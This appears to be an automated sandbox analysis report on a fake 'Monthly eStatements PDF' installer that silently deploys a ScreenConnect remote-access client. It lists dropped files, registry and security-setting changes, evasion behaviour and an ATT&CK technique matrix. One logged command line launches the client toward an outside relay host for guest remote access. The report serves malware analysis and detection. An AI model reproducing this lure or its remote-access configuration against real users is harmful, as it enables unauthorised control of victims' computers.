Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\1dbdd63f-4d6b-4298-ade7-fe6b36b28adf.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 19F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 3440000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 31E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 6B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 62C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 7B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 8B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 6B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 8E00000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: 9E00000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 1D90000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 1F10000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 3F10000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 1320000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 1AE90000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.Cab.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI73FE.tmp
                      Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe
                      Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp
                      Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll
                      Source: C:\Windows\System32\svchost.exe TID: 2648 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe TID: 7912 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe TID: 6624 Thread sleep count: 43 > 30
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Process token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process token adjusted: Debug
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                      Source: unknown Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=tmqw21a.zapto.org&p=8041&s=2bb258fa-13a9-41c5-bd5b-67ab96b0c2b1&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&i=amazon"
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe -- Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\msiexec.exe -- Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
Source: C:\Windows\System32\svchost.exe -- WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe -- WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: Yara match -- File source: 0000000C.00000002.1484985430.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000014.00000000.1517220896.0000000000A72000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match -- File source: 0000000C.00000000.1466317560.00000000009A6000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match -- File source: 0000000C.00000002.1476357184.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: C:\Windows\Installer\MSI719A.tmp, type: DROPPED
Source: Yara match -- File source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match -- File source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, type: DROPPED
Source: Yara match -- File source: 00000014.00000002.2397940469.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Techniques by tactic (counts shown in the original matrix are given in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Component Object Model Hijacking (1); Windows Service (2); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Component Object Model Hijacking (1); Windows Service (2); Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); RC Scripts; Startup Items
Defense Evasion: Masquerading (22); Disable or Modify Tools (21); Virtualization/Sandbox Evasion (51); Process Injection (11); Rundll32 (1); DLL Side-Loading (1); File Deletion (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (3); Process Discovery (1); Virtualization/Sandbox Evasion (51); Peripheral Device Discovery (11); File and Directory Discovery (1); System Information Discovery (23); Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (2); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Source | Detection | Scanner | Label
https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | 0% | Avira URL Cloud | safe

Source | Detection | Scanner | Label
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs |
C:\Windows\Installer\MSI73FE.tmp | 0% | ReversingLabs |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.181.68 | true | false | | high
